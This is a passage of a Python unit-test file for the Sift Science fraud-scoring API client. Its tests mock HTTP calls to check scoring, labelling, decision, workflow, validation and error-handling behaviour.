'https://api.siftscience.com/v205/score/12345',
params={'api_key': self.test_key},
headers=mock.ANY,
timeout=mock.ANY)
self.assertIsInstance(response, sift.client.Response)
assert(response.is_ok())
assert(response.api_error_message == "OK")
assert(response.body['score'] == 0.85)
assert(response.body['scores']['content_abuse']['score'] == 0.14)
assert(response.body['scores']['payment_abuse']['score'] == 0.97)
def test_score_with_timeout_param_ok(self):
test_timeout = 5
mock_response = mock.Mock()
mock_response.content = score_response_json()
mock_response.json.return_value = json.loads(mock_response.content)
mock_response.status_code = 200
mock_response.headers = response_with_data_header()
with mock.patch.object(self.sift_client.session, 'get') as mock_get:
mock_get.return_value = mock_response
response = self.sift_client.score('12345', test_timeout)
mock_get.assert_called_with(
'https://api.siftscience.com/v205/score/12345',
params={'api_key': self.test_key},
headers=mock.ANY,
timeout=test_timeout)
self.assertIsInstance(response, sift.client.Response)
assert(response.is_ok())
assert(response.api_error_message == "OK")
assert(response.body['score'] == 0.85)
assert(response.body['scores']['content_abuse']['score'] == 0.14)
assert(response.body['scores']['payment_abuse']['score'] == 0.97)
def test_get_user_score_ok(self):
"""Test the GET /{version}/users/{userId}/score API, i.e. client.get_user_score()
"""
test_timeout = 5
mock_response = mock.Mock()
mock_response.content = USER_SCORE_RESPONSE_JSON
mock_response.json.return_value = json.loads(mock_response.content)
mock_response.status_code = 200
mock_response.headers = response_with_data_header()
with mock.patch.object(self.sift_client.session, 'get') as mock_get:
mock_get.return_value = mock_response
response = self.sift_client.get_user_score('12345', test_timeout)
mock_get.assert_called_with(
'https://api.siftscience.com/v205/users/12345/score',
params={'api_key': self.test_key},
headers=mock.ANY,
timeout=test_timeout)
self.assertIsInstance(response, sift.client.Response)
assert(response.is_ok())
assert(response.api_error_message == "OK")
assert(response.body['entity_id'] == '12345')
assert(response.body['scores']['content_abuse']['score'] == 0.14)
assert(response.body['scores']['payment_abuse']['score'] == 0.97)
assert('latest_decisions' in response.body)
def test_get_user_score_with_abuse_types_ok(self):
"""Test the GET /{version}/users/{userId}/score?abuse_types=... API, i.e. client.get_user_score()
"""
test_timeout = 5
mock_response = mock.Mock()
mock_response.content = USER_SCORE_RESPONSE_JSON
mock_response.json.return_value = json.loads(mock_response.content)
mock_response.status_code = 200
mock_response.headers = response_with_data_header()
with mock.patch.object(self.sift_client.session, 'get') as mock_get:
mock_get.return_value = mock_response
response = self.sift_client.get_user_score('12345',
abuse_types=['payment_abuse', 'content_abuse'],
timeout=test_timeout)
mock_get.assert_called_with(
'https://api.siftscience.com/v205/users/12345/score',
params={'api_key': self.test_key, 'abuse_types': 'payment_abuse,content_abuse'},
headers=mock.ANY,
timeout=test_timeout)
self.assertIsInstance(response, sift.client.Response)
assert(response.is_ok())
assert(response.api_error_message == "OK")
assert(response.body['entity_id'] == '12345')
assert(response.body['scores']['content_abuse']['score'] == 0.14)
assert(response.body['scores']['payment_abuse']['score'] == 0.97)
assert('latest_decisions' in response.body)
def test_rescore_user_ok(self):
"""Test the POST /{version}/users/{userId}/score API, i.e. client.rescore_user()
"""
test_timeout = 5
mock_response = mock.Mock()
mock_response.content = USER_SCORE_RESPONSE_JSON
mock_response.json.return_value = json.loads(mock_response.content)
mock_response.status_code = 200
mock_response.headers = response_with_data_header()
with mock.patch.object(self.sift_client.session, 'post') as mock_post:
mock_post.return_value = mock_response
response = self.sift_client.rescore_user('12345', test_timeout)
mock_post.assert_called_with(
'https://api.siftscience.com/v205/users/12345/score',
params={'api_key': self.test_key},
headers=mock.ANY,
timeout=test_timeout)
self.assertIsInstance(response, sift.client.Response)
assert(response.is_ok())
assert(response.api_error_message == "OK")
assert(response.body['entity_id'] == '12345')
assert(response.body['scores']['content_abuse']['score'] == 0.14)
assert(response.body['scores']['payment_abuse']['score'] == 0.97)
assert('latest_decisions' in response.body)
def test_rescore_user_with_abuse_types_ok(self):
    """Test the POST /{version}/users/{userId}/score?abuse_types=... API, i.e. client.rescore_user()
    """
    test_timeout = 5
    mock_response = mock.Mock()
    mock_response.content = USER_SCORE_RESPONSE_JSON
    mock_response.json.return_value = json.loads(mock_response.content)
    mock_response.status_code = 200
    mock_response.headers = response_with_data_header()
    with mock.patch.object(self.sift_client.session, 'post') as mock_post:
        mock_post.return_value = mock_response
        response = self.sift_client.rescore_user('12345',
                                                 abuse_types=['payment_abuse', 'content_abuse'],
                                                 timeout=test_timeout)
        # Abuse types must be joined into one comma-separated query parameter.
        mock_post.assert_called_with(
            'https://api.siftscience.com/v205/users/12345/score',
            params={'api_key': self.test_key, 'abuse_types': 'payment_abuse,content_abuse'},
            headers=mock.ANY,
            timeout=test_timeout)
        self.assertIsInstance(response, sift.client.Response)
        # unittest assertions are not stripped under ``python -O``.
        self.assertTrue(response.is_ok())
        self.assertEqual(response.api_error_message, "OK")
        self.assertEqual(response.body['entity_id'], '12345')
        self.assertEqual(response.body['scores']['content_abuse']['score'], 0.14)
        self.assertEqual(response.body['scores']['payment_abuse']['score'], 0.97)
        self.assertIn('latest_decisions', response.body)
def test_sync_score_ok(self):
    """Test synchronous scoring: track() with return_score and abuse_types set."""
    event = '$transaction'
    mock_response = mock.Mock()
    mock_response.content = ('{"status": 0, "error_message": "OK", "score_response": %s}'
                             % score_response_json())
    mock_response.json.return_value = json.loads(mock_response.content)
    mock_response.status_code = 200
    mock_response.headers = response_with_data_header()
    with mock.patch.object(self.sift_client.session, 'post') as mock_post:
        mock_post.return_value = mock_response
        response = self.sift_client.track(
            event,
            valid_transaction_properties(),
            return_score=True,
            abuse_types=['payment_abuse', 'content_abuse', 'legacy'])
        mock_post.assert_called_with(
            'https://api.siftscience.com/v205/events',
            data=mock.ANY,
            headers=mock.ANY,
            timeout=mock.ANY,
            params={'return_score': 'true', 'abuse_types': 'payment_abuse,content_abuse,legacy'})
        self.assertIsInstance(response, sift.client.Response)
        # unittest assertions are not stripped under ``python -O``.
        self.assertTrue(response.is_ok())
        self.assertEqual(response.api_status, 0)
        self.assertEqual(response.api_error_message, "OK")
        self.assertEqual(response.body['score_response']['score'], 0.85)
        self.assertEqual(response.body['score_response']['scores']['content_abuse']['score'], 0.14)
        self.assertEqual(response.body['score_response']['scores']['payment_abuse']['score'], 0.97)
def test_get_decisions_fails(self):
    """An unsupported entity type must be rejected with a ValueError."""
    self.assertRaises(ValueError, self.sift_client.get_decisions, 'usr')
def test_get_decisions(self):
    """Test GET /v3/accounts/{accountId}/decisions, i.e. client.get_decisions()."""
    mock_response = mock.Mock()
    get_decisions_response_json = """
    {
        "data": [
            {
                "id": "block_user",
                "name": "Block user",
                "description": "user has a different billing and shipping addresses",
                "entity_type": "user",
                "abuse_type": "legacy",
                "category": "block",
                "webhook_url": "http://web.hook",
                "created_at": "1468005577348",
                "created_by": "admin@biz.com",
                "updated_at": "1469229177756",
                "updated_by": "analyst@biz.com"
            }
        ],
        "has_more": "true",
        "next_ref": "v3/accounts/accountId/decisions"
    }
    """
    mock_response.content = get_decisions_response_json
    mock_response.json.return_value = json.loads(mock_response.content)
    mock_response.status_code = 200
    mock_response.headers = response_with_data_header()
    with mock.patch.object(self.sift_client.session, 'get') as mock_get:
        mock_get.return_value = mock_response
        response = self.sift_client.get_decisions(entity_type="user",
                                                  limit=10,
                                                  start_from=None,
                                                  abuse_types="legacy,payment_abuse",
                                                  timeout=3)
        # start_from=None must be dropped from the query parameters.
        mock_get.assert_called_with(
            'https://api3.siftscience.com/v3/accounts/ACCT/decisions',
            headers=mock.ANY,
            auth=mock.ANY,
            params={'entity_type': 'user', 'limit': 10, 'abuse_types': 'legacy,payment_abuse'},
            timeout=3)
        self.assertIsInstance(response, sift.client.Response)
        # unittest assertions are not stripped under ``python -O``.
        self.assertTrue(response.is_ok())
        self.assertEqual(response.body['data'][0]['id'], 'block_user')
def test_get_decisions_entity_session(self):
    """Test GET /v3/accounts/{accountId}/decisions for the 'session' entity type."""
    mock_response = mock.Mock()
    get_decisions_response_json = """
    {
        "data": [
            {
                "id": "block_session",
                "name": "Block session",
                "description": "session has problems",
                "entity_type": "session",
                "abuse_type": "legacy",
                "category": "block",
                "webhook_url": "http://web.hook",
                "created_at": "1468005577348",
                "created_by": "admin@biz.com",
                "updated_at": "1469229177756",
                "updated_by": "analyst@biz.com"
            }
        ],
        "has_more": "true",
        "next_ref": "v3/accounts/accountId/decisions"
    }
    """
    mock_response.content = get_decisions_response_json
    mock_response.json.return_value = json.loads(mock_response.content)
    mock_response.status_code = 200
    mock_response.headers = response_with_data_header()
    with mock.patch.object(self.sift_client.session, 'get') as mock_get:
        mock_get.return_value = mock_response
        response = self.sift_client.get_decisions(entity_type="session",
                                                  limit=10,
                                                  start_from=None,
                                                  abuse_types="account_takeover",
                                                  timeout=3)
        mock_get.assert_called_with(
            'https://api3.siftscience.com/v3/accounts/ACCT/decisions',
            headers=mock.ANY,
            auth=mock.ANY,
            params={'entity_type': 'session', 'limit': 10, 'abuse_types': 'account_takeover'},
            timeout=3)
        self.assertIsInstance(response, sift.client.Response)
        # unittest assertions are not stripped under ``python -O``.
        self.assertTrue(response.is_ok())
        self.assertEqual(response.body['data'][0]['id'], 'block_session')
def test_apply_decision_to_user_ok(self):
    """Test POST /v3/accounts/{accountId}/users/{userId}/decisions."""
    user_id = '54321'
    mock_response = mock.Mock()
    apply_decision_request = {
        'decision_id': 'user_looks_ok_legacy',
        'source': 'MANUAL_REVIEW',
        'analyst': 'analyst@biz.com',
        'description': 'called user and verified account',
        'time': 1481569575
    }
    apply_decision_response_json = """
    {
        "entity": {
            "id": "54321",
            "type": "user"
        },
        "decision": {
            "id": "user_looks_ok_legacy"
        },
        "time": "1481569575"
    }
    """
    mock_response.content = apply_decision_response_json
    mock_response.json.return_value = json.loads(mock_response.content)
    mock_response.status_code = 200
    mock_response.headers = response_with_data_header()
    with mock.patch.object(self.sift_client.session, 'post') as mock_post:
        mock_post.return_value = mock_response
        response = self.sift_client.apply_user_decision(user_id, apply_decision_request)
        # The request dict must be serialized verbatim as the POST body.
        data = json.dumps(apply_decision_request)
        mock_post.assert_called_with(
            'https://api3.siftscience.com/v3/accounts/ACCT/users/%s/decisions' % user_id,
            auth=mock.ANY, data=data, headers=mock.ANY, timeout=mock.ANY)
        self.assertIsInstance(response, sift.client.Response)
        # unittest assertions are not stripped under ``python -O``.
        self.assertEqual(response.body['entity']['type'], 'user')
        self.assertEqual(response.http_status_code, 200)
        self.assertTrue(response.is_ok())
def test_validate_no_user_id_string_fails(self):
    """A non-string user id must be rejected with a TypeError."""
    decision_properties = {
        'decision_id': 'user_looks_ok_legacy',
        'source': 'MANUAL_REVIEW',
        'analyst': 'analyst@biz.com',
        'description': 'called user and verified account',
    }
    # 123 is an int, not a string, so validation must fail.
    self.assertRaises(
        TypeError,
        self.sift_client._validate_apply_decision_request,
        decision_properties,
        123)
def test_apply_decision_to_order_fails_with_no_order_id(self):
    """A missing order id must raise a TypeError."""
    self.assertRaises(
        TypeError, self.sift_client.apply_order_decision, "user_id", None, {})
def test_apply_decision_to_session_fails_with_no_session_id(self):
    """A missing session id must raise a TypeError."""
    self.assertRaises(
        TypeError, self.sift_client.apply_session_decision, "user_id", None, {})
def test_get_session_decisions_fails_with_no_session_id(self):
    """A missing session id must raise a TypeError."""
    self.assertRaises(
        TypeError, self.sift_client.get_session_decisions, "user_id", None)
def test_apply_decision_to_content_fails_with_no_content_id(self):
    """A missing content id must raise a TypeError."""
    self.assertRaises(
        TypeError, self.sift_client.apply_content_decision, "user_id", None, {})
def test_validate_apply_decision_request_no_analyst_fails(self):
    """A MANUAL_REVIEW request without an analyst must be rejected."""
    decision_properties = {
        'decision_id': 'user_looks_ok_legacy',
        'source': 'MANUAL_REVIEW',
        'time': 1481569575
    }
    self.assertRaises(
        ValueError,
        self.sift_client._validate_apply_decision_request,
        decision_properties,
        "userId")
def test_validate_apply_decision_request_no_source_fails(self):
    """A request without a decision source must be rejected."""
    decision_properties = {
        'decision_id': 'user_looks_ok_legacy',
        'time': 1481569575
    }
    self.assertRaises(
        ValueError,
        self.sift_client._validate_apply_decision_request,
        decision_properties,
        "userId")
def test_validate_empty_apply_decision_request_fails(self):
    """An empty request dict must be rejected."""
    self.assertRaises(
        ValueError,
        self.sift_client._validate_apply_decision_request,
        {},
        "userId")
def test_apply_decision_manual_review_no_analyst_fails(self):
    """apply_user_decision must reject MANUAL_REVIEW without an analyst."""
    decision_properties = {
        'decision_id': 'user_looks_ok_legacy',
        'source': 'MANUAL_REVIEW',
        'time': 1481569575
    }
    self.assertRaises(
        ValueError, self.sift_client.apply_user_decision, '54321', decision_properties)
def test_apply_decision_no_source_fails(self):
    """apply_user_decision must reject a request with no source."""
    decision_properties = {
        'decision_id': 'user_looks_ok_legacy',
        'time': 1481569575
    }
    self.assertRaises(
        ValueError, self.sift_client.apply_user_decision, '54321', decision_properties)
def test_apply_decision_invalid_source_fails(self):
    """apply_user_decision must reject an unrecognized decision source."""
    decision_properties = {
        'decision_id': 'user_looks_ok_legacy',
        'source': 'INVALID_SOURCE',
        'time': 1481569575
    }
    with self.assertRaises(ValueError):
        self.sift_client.apply_user_decision('54321', decision_properties)
def test_apply_decision_to_order_ok(self):
    """Test POST /v3/accounts/{accountId}/users/{userId}/orders/{orderId}/decisions."""
    user_id = '54321'
    order_id = '43210'
    mock_response = mock.Mock()
    apply_decision_request = {
        'decision_id': 'order_looks_bad_payment_abuse',
        'source': 'AUTOMATED_RULE',
        'time': 1481569575
    }
    apply_decision_response_json = """
    {
        "entity": {
            "id": "54321",
            "type": "order"
        },
        "decision": {
            "id": "order_looks_bad_payment_abuse"
        },
        "time": "1481569575"
    }
    """
    mock_response.content = apply_decision_response_json
    mock_response.json.return_value = json.loads(mock_response.content)
    mock_response.status_code = 200
    mock_response.headers = response_with_data_header()
    with mock.patch.object(self.sift_client.session, 'post') as mock_post:
        mock_post.return_value = mock_response
        response = self.sift_client.apply_order_decision(user_id, order_id, apply_decision_request)
        data = json.dumps(apply_decision_request)
        mock_post.assert_called_with(
            'https://api3.siftscience.com/v3/accounts/ACCT/users/%s/orders/%s/decisions' % (user_id, order_id),
            auth=mock.ANY, data=data, headers=mock.ANY, timeout=mock.ANY)
        self.assertIsInstance(response, sift.client.Response)
        # unittest assertions are not stripped under ``python -O``.
        self.assertTrue(response.is_ok())
        self.assertEqual(response.http_status_code, 200)
        self.assertEqual(response.body['entity']['type'], 'order')
def test_apply_decision_to_session_ok(self):
    """Test POST /v3/accounts/{accountId}/users/{userId}/sessions/{sessionId}/decisions."""
    user_id = '54321'
    session_id = 'gigtleqddo84l8cm15qe4il'
    mock_response = mock.Mock()
    apply_decision_request = {
        'decision_id': 'session_looks_bad_ato',
        'source': 'AUTOMATED_RULE',
        'time': 1481569575
    }
    apply_decision_response_json = """
    {
        "entity": {
            "id": "54321",
            "type": "login"
        },
        "decision": {
            "id": "session_looks_bad_ato"
        },
        "time": "1481569575"
    }
    """
    mock_response.content = apply_decision_response_json
    mock_response.json.return_value = json.loads(mock_response.content)
    mock_response.status_code = 200
    mock_response.headers = response_with_data_header()
    with mock.patch.object(self.sift_client.session, 'post') as mock_post:
        mock_post.return_value = mock_response
        response = self.sift_client.apply_session_decision(user_id, session_id, apply_decision_request)
        data = json.dumps(apply_decision_request)
        mock_post.assert_called_with(
            'https://api3.siftscience.com/v3/accounts/ACCT/users/%s/sessions/%s/decisions' % (user_id, session_id),
            auth=mock.ANY, data=data, headers=mock.ANY, timeout=mock.ANY)
        self.assertIsInstance(response, sift.client.Response)
        # unittest assertions are not stripped under ``python -O``.
        self.assertTrue(response.is_ok())
        self.assertEqual(response.http_status_code, 200)
        self.assertEqual(response.body['entity']['type'], 'login')
def test_apply_decision_to_content_ok(self):
    """Test POST /v3/accounts/{accountId}/users/{userId}/content/{contentId}/decisions."""
    user_id = '54321'
    content_id = 'listing-1231'
    mock_response = mock.Mock()
    apply_decision_request = {
        'decision_id': 'content_looks_bad_content_abuse',
        'source': 'AUTOMATED_RULE',
        'time': 1481569575
    }
    apply_decision_response_json = """
    {
        "entity": {
            "id": "54321",
            "type": "create_content"
        },
        "decision": {
            "id": "content_looks_bad_content_abuse"
        },
        "time": "1481569575"
    }
    """
    mock_response.content = apply_decision_response_json
    mock_response.json.return_value = json.loads(mock_response.content)
    mock_response.status_code = 200
    mock_response.headers = response_with_data_header()
    with mock.patch.object(self.sift_client.session, 'post') as mock_post:
        mock_post.return_value = mock_response
        response = self.sift_client.apply_content_decision(user_id, content_id, apply_decision_request)
        data = json.dumps(apply_decision_request)
        mock_post.assert_called_with(
            'https://api3.siftscience.com/v3/accounts/ACCT/users/%s/content/%s/decisions' % (user_id, content_id),
            auth=mock.ANY, data=data, headers=mock.ANY, timeout=mock.ANY)
        self.assertIsInstance(response, sift.client.Response)
        # unittest assertions are not stripped under ``python -O``.
        self.assertTrue(response.is_ok())
        self.assertEqual(response.http_status_code, 200)
        self.assertEqual(response.body['entity']['type'], 'create_content')
def test_label_user_ok(self):
    """Test POST /{version}/users/{userId}/labels, i.e. client.label()."""
    user_id = '54321'
    mock_response = mock.Mock()
    mock_response.content = '{"status": 0, "error_message": "OK"}'
    mock_response.json.return_value = json.loads(mock_response.content)
    mock_response.status_code = 200
    mock_response.headers = response_with_data_header()
    with mock.patch.object(self.sift_client.session, 'post') as mock_post:
        mock_post.return_value = mock_response
        response = self.sift_client.label(user_id, valid_label_properties())
        # Rebuild the exact payload the client is expected to send:
        # label properties plus the api key and the reserved $label type.
        properties = {
            '$abuse_type': 'content_abuse',
            '$is_bad': True,
            '$description': 'Listed a fake item',
            '$source': 'Internal Review Queue',
            '$analyst': 'super.sleuth@example.com'
        }
        properties.update({'$api_key': self.test_key, '$type': '$label'})
        data = json.dumps(properties)
        mock_post.assert_called_with(
            'https://api.siftscience.com/v205/users/%s/labels' % user_id,
            data=data, headers=mock.ANY, timeout=mock.ANY, params={})
        self.assertIsInstance(response, sift.client.Response)
        # unittest assertions are not stripped under ``python -O``.
        self.assertTrue(response.is_ok())
        self.assertEqual(response.api_status, 0)
        self.assertEqual(response.api_error_message, "OK")
def test_label_user_with_timeout_param_ok(self):
    """client.label() must forward an explicit timeout to the HTTP call."""
    user_id = '54321'
    test_timeout = 5
    mock_response = mock.Mock()
    mock_response.content = '{"status": 0, "error_message": "OK"}'
    mock_response.json.return_value = json.loads(mock_response.content)
    mock_response.status_code = 200
    mock_response.headers = response_with_data_header()
    with mock.patch.object(self.sift_client.session, 'post') as mock_post:
        mock_post.return_value = mock_response
        response = self.sift_client.label(
            user_id, valid_label_properties(), test_timeout)
        properties = {
            '$abuse_type': 'content_abuse',
            '$is_bad': True,
            '$description': 'Listed a fake item',
            '$source': 'Internal Review Queue',
            '$analyst': 'super.sleuth@example.com'
        }
        properties.update({'$api_key': self.test_key, '$type': '$label'})
        data = json.dumps(properties)
        mock_post.assert_called_with(
            'https://api.siftscience.com/v205/users/%s/labels' % user_id,
            data=data, headers=mock.ANY, timeout=test_timeout, params={})
        self.assertIsInstance(response, sift.client.Response)
        # unittest assertions are not stripped under ``python -O``.
        self.assertTrue(response.is_ok())
        self.assertEqual(response.api_status, 0)
        self.assertEqual(response.api_error_message, "OK")
def test_unlabel_user_ok(self):
    """Test DELETE /{version}/users/{userId}/labels, i.e. client.unlabel()."""
    user_id = '54321'
    mock_response = mock.Mock()
    # Unlabel returns 204 No Content, so no body/headers are set on the mock.
    mock_response.status_code = 204
    with mock.patch.object(self.sift_client.session, 'delete') as mock_delete:
        mock_delete.return_value = mock_response
        response = self.sift_client.unlabel(user_id, abuse_type='account_abuse')
        mock_delete.assert_called_with(
            'https://api.siftscience.com/v205/users/%s/labels' % user_id,
            headers=mock.ANY,
            timeout=mock.ANY,
            params={'api_key': self.test_key, 'abuse_type': 'account_abuse'})
        self.assertIsInstance(response, sift.client.Response)
        # unittest assertions are not stripped under ``python -O``.
        self.assertTrue(response.is_ok())
def test_unicode_string_parameter_support(self):
    """Unicode ids and event names must be accepted (Python 2 only path).

    str is unicode in python 3, so no need to check as this was covered
    by other unit tests.
    """
    if sys.version_info[0] < 3:
        mock_response = mock.Mock()
        mock_response.content = '{"status": 0, "error_message": "OK"}'
        mock_response.json.return_value = json.loads(mock_response.content)
        mock_response.status_code = 200
        mock_response.headers = response_with_data_header()
        user_id = u'23056'
        with mock.patch.object(self.sift_client.session, 'post') as mock_post:
            mock_post.return_value = mock_response
            # unittest assertions are not stripped under ``python -O``.
            self.assertTrue(self.sift_client.track(
                u'$transaction',
                valid_transaction_properties()))
            self.assertTrue(self.sift_client.label(
                user_id,
                valid_label_properties()))
        with mock.patch.object(self.sift_client.session, 'get') as mock_get:
            mock_get.return_value = mock_response
            self.assertTrue(self.sift_client.score(
                user_id, abuse_types=[u'payment_abuse', 'content_abuse']))
def test_unlabel_user_with_special_chars_ok(self):
    """client.unlabel() must URL-quote special characters in the user id."""
    user_id = "54321=.-_+@:&^%!$"
    mock_response = mock.Mock()
    mock_response.status_code = 204
    with mock.patch.object(self.sift_client.session, 'delete') as mock_delete:
        mock_delete.return_value = mock_response
        response = self.sift_client.unlabel(user_id)
        mock_delete.assert_called_with(
            'https://api.siftscience.com/v205/users/%s/labels' % urllib.quote(user_id),
            headers=mock.ANY,
            timeout=mock.ANY,
            params={'api_key': self.test_key})
        self.assertIsInstance(response, sift.client.Response)
        # unittest assertions are not stripped under ``python -O``.
        self.assertTrue(response.is_ok())
def test_label_user__with_special_chars_ok(self):
    """client.label() must URL-quote special characters in the user id."""
    user_id = '54321=.-_+@:&^%!$'
    mock_response = mock.Mock()
    mock_response.content = '{"status": 0, "error_message": "OK"}'
    mock_response.json.return_value = json.loads(mock_response.content)
    mock_response.status_code = 200
    mock_response.headers = response_with_data_header()
    with mock.patch.object(self.sift_client.session, 'post') as mock_post:
        mock_post.return_value = mock_response
        response = self.sift_client.label(
            user_id, valid_label_properties())
        properties = {
            '$abuse_type': 'content_abuse',
            '$is_bad': True,
            '$description': 'Listed a fake item',
            '$source': 'Internal Review Queue',
            '$analyst': 'super.sleuth@example.com'
        }
        properties.update({'$api_key': self.test_key, '$type': '$label'})
        data = json.dumps(properties)
        mock_post.assert_called_with(
            'https://api.siftscience.com/v205/users/%s/labels' % urllib.quote(user_id),
            data=data,
            headers=mock.ANY,
            timeout=mock.ANY,
            params={})
        self.assertIsInstance(response, sift.client.Response)
        # unittest assertions are not stripped under ``python -O``.
        self.assertTrue(response.is_ok())
        self.assertEqual(response.api_status, 0)
        self.assertEqual(response.api_error_message, "OK")
def test_score__with_special_user_id_chars_ok(self):
    """client.score() must URL-quote special characters in the user id."""
    user_id = '54321=.-_+@:&^%!$'
    mock_response = mock.Mock()
    mock_response.content = score_response_json()
    mock_response.json.return_value = json.loads(mock_response.content)
    mock_response.status_code = 200
    mock_response.headers = response_with_data_header()
    with mock.patch.object(self.sift_client.session, 'get') as mock_get:
        mock_get.return_value = mock_response
        response = self.sift_client.score(user_id, abuse_types=['legacy'])
        mock_get.assert_called_with(
            'https://api.siftscience.com/v205/score/%s' % urllib.quote(user_id),
            params={'api_key': self.test_key, 'abuse_types': 'legacy'},
            headers=mock.ANY,
            timeout=mock.ANY)
        self.assertIsInstance(response, sift.client.Response)
        # unittest assertions are not stripped under ``python -O``.
        self.assertTrue(response.is_ok())
        self.assertEqual(response.api_error_message, "OK")
        self.assertEqual(response.body['score'], 0.85)
        self.assertEqual(response.body['scores']['content_abuse']['score'], 0.14)
        self.assertEqual(response.body['scores']['payment_abuse']['score'], 0.97)
def test_exception_during_track_call(self):
    """A transport failure during track() must surface as ApiException."""
    warnings.simplefilter("always")
    with mock.patch.object(self.sift_client.session, 'post') as mock_post:
        # The patched POST raises instead of returning a response.
        mock_post.side_effect = mock.Mock(
            side_effect=requests.exceptions.RequestException("Failed"))
        with self.assertRaises(sift.client.ApiException):
            self.sift_client.track('$transaction', valid_transaction_properties())
def test_exception_during_score_call(self):
    """A transport failure during score() must surface as ApiException."""
    warnings.simplefilter("always")
    with mock.patch.object(self.sift_client.session, 'get') as mock_get:
        # The patched GET raises instead of returning a response.
        mock_get.side_effect = mock.Mock(
            side_effect=requests.exceptions.RequestException("Failed"))
        with self.assertRaises(sift.client.ApiException):
            self.sift_client.score('Fred')
def test_exception_during_unlabel_call(self):
    """A transport failure during unlabel() must surface as ApiException."""
    warnings.simplefilter("always")
    with mock.patch.object(self.sift_client.session, 'delete') as mock_delete:
        # The patched DELETE raises instead of returning a response.
        mock_delete.side_effect = mock.Mock(
            side_effect=requests.exceptions.RequestException("Failed"))
        with self.assertRaises(sift.client.ApiException):
            self.sift_client.unlabel('Fred')
def test_return_actions_on_track(self):
    """track() with return_action=True must request and expose actions."""
    event = '$transaction'
    mock_response = mock.Mock()
    mock_response.content = ('{"status": 0, "error_message": "OK", "score_response": %s}'
                             % action_response_json())
    mock_response.json.return_value = json.loads(mock_response.content)
    mock_response.status_code = 200
    mock_response.headers = response_with_data_header()
    with mock.patch.object(self.sift_client.session, 'post') as mock_post:
        mock_post.return_value = mock_response
        response = self.sift_client.track(
            event, valid_transaction_properties(), return_action=True)
        mock_post.assert_called_with(
            'https://api.siftscience.com/v205/events',
            data=mock.ANY,
            headers=mock.ANY,
            timeout=mock.ANY,
            params={'return_action': 'true'})
        self.assertIsInstance(response, sift.client.Response)
        # unittest assertions are not stripped under ``python -O``.
        self.assertTrue(response.is_ok())
        self.assertEqual(response.api_status, 0)
        self.assertEqual(response.api_error_message, "OK")
        actions = response.body["score_response"]['actions']
        self.assertTrue(actions)
        self.assertTrue(actions[0]['action'])
        self.assertEqual(actions[0]['action']['id'], 'freds_action')
        self.assertTrue(actions[0]['triggers'])
def test_get_workflow_status(self):
    """Test GET /v3/accounts/{accountId}/workflows/runs/{runId}."""
    mock_response = mock.Mock()
    mock_response.content = """
    {
        "id": "4zxwibludiaaa",
        "config": {
            "id": "5rrbr4iaaa",
            "version": "1468367620871"
        },
        "config_display_name": "workflow config",
        "abuse_types": [
            "payment_abuse"
        ],
        "state": "running",
        "entity": {
            "id": "example_user",
            "type": "user"
        },
        "history": [
            {
                "app": "decision",
                "name": "decision",
                "state": "running",
                "config": {
                    "decision_id": "user_decision"
                }
            },
            {
                "app": "event",
                "name": "Event",
                "state": "finished",
                "config": {}
            },
            {
                "app": "user",
                "name": "Entity",
                "state": "finished",
                "config": {}
            }
        ]
    }
    """
    mock_response.json.return_value = json.loads(mock_response.content)
    mock_response.status_code = 200
    mock_response.headers = response_with_data_header()
    with mock.patch.object(self.sift_client.session, 'get') as mock_get:
        mock_get.return_value = mock_response
        response = self.sift_client.get_workflow_status('4zxwibludiaaa', timeout=3)
        mock_get.assert_called_with(
            'https://api3.siftscience.com/v3/accounts/ACCT/workflows/runs/4zxwibludiaaa',
            headers=mock.ANY, auth=mock.ANY, timeout=3)
        self.assertIsInstance(response, sift.client.Response)
        # unittest assertions are not stripped under ``python -O``.
        self.assertTrue(response.is_ok())
        self.assertEqual(response.body['state'], 'running')
def test_get_user_decisions(self):
    """Test GET /v3/accounts/{accountId}/users/{userId}/decisions."""
    mock_response = mock.Mock()
    mock_response.content = """
    {
        "decisions": {
            "payment_abuse": {
                "decision": {
                    "id": "user_decision"
                },
                "time": 1468707128659,
                "webhook_succeeded": false
            }
        }
    }
    """
    mock_response.json.return_value = json.loads(mock_response.content)
    mock_response.status_code = 200
    mock_response.headers = response_with_data_header()
    with mock.patch.object(self.sift_client.session, 'get') as mock_get:
        mock_get.return_value = mock_response
        response = self.sift_client.get_user_decisions('example_user')
        mock_get.assert_called_with(
            'https://api3.siftscience.com/v3/accounts/ACCT/users/example_user/decisions',
            headers=mock.ANY, auth=mock.ANY, timeout=mock.ANY)
        self.assertIsInstance(response, sift.client.Response)
        # unittest assertions are not stripped under ``python -O``.
        self.assertTrue(response.is_ok())
        self.assertEqual(response.body['decisions']['payment_abuse']['decision']['id'],
                         'user_decision')
def test_get_order_decisions(self):
    """Test GET /v3/accounts/{accountId}/orders/{orderId}/decisions."""
    mock_response = mock.Mock()
    mock_response.content = """
    {
        "decisions": {
            "payment_abuse": {
                "decision": {
                    "id": "decision7"
                },
                "time": 1468599638005,
                "webhook_succeeded": false
            },
            "promotion_abuse": {
                "decision": {
                    "id": "good_order"
                },
                "time": 1468517407135,
                "webhook_succeeded": true
            }
        }
    }
    """
    mock_response.json.return_value = json.loads(mock_response.content)
    mock_response.status_code = 200
    mock_response.headers = response_with_data_header()
    with mock.patch.object(self.sift_client.session, 'get') as mock_get:
        mock_get.return_value = mock_response
        response = self.sift_client.get_order_decisions('example_order')
        mock_get.assert_called_with(
            'https://api3.siftscience.com/v3/accounts/ACCT/orders/example_order/decisions',
            headers=mock.ANY, auth=mock.ANY, timeout=mock.ANY)
        self.assertIsInstance(response, sift.client.Response)
        # unittest assertions are not stripped under ``python -O``.
        self.assertTrue(response.is_ok())
        self.assertEqual(response.body['decisions']['payment_abuse']['decision']['id'],
                         'decision7')
        self.assertEqual(response.body['decisions']['promotion_abuse']['decision']['id'],
                         'good_order')
def test_get_session_decisions(self):
    """Test GET /v3/accounts/{accountId}/users/{userId}/sessions/{sessionId}/decisions."""
    mock_response = mock.Mock()
    mock_response.content = """
    {
        "decisions": {
            "account_takeover": {
                "decision": {
                    "id": "session_decision"
                },
                "time": 1461963839151,
                "webhook_succeeded": true
            }
        }
    }
    """
    mock_response.json.return_value = json.loads(mock_response.content)
    mock_response.status_code = 200
    mock_response.headers = response_with_data_header()
    with mock.patch.object(self.sift_client.session, 'get') as mock_get:
        mock_get.return_value = mock_response
        response = self.sift_client.get_session_decisions('example_user', 'example_session')
        mock_get.assert_called_with(
            'https://api3.siftscience.com/v3/accounts/ACCT/users/example_user/sessions/example_session/decisions',
            headers=mock.ANY, auth=mock.ANY, timeout=mock.ANY)
